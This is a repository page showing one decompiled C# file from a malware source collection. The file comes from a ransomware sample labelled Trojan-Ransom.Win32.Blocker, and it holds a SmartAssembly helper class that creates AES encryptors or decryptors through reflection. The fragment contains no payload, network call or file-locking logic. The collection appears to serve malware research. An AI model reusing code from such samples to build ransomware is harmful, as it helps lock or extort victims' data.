MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/AESCryptoIndirector.cs

53 lines
1.9 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.AESCryptoIndirector
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class AESCryptoIndirector : IDisposable
{
private readonly Type m_AcspType;
private readonly object m_AESCryptoServiceProvider;
public AESCryptoIndirector()
{
try
{
this.m_AcspType = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.m_AcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.m_AESCryptoServiceProvider = Activator.CreateInstance(this.m_AcspType);
}
public ICryptoTransform GetAESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_AcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_AcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_AcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_AcspType.GetMethod(nameof (Clear)).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}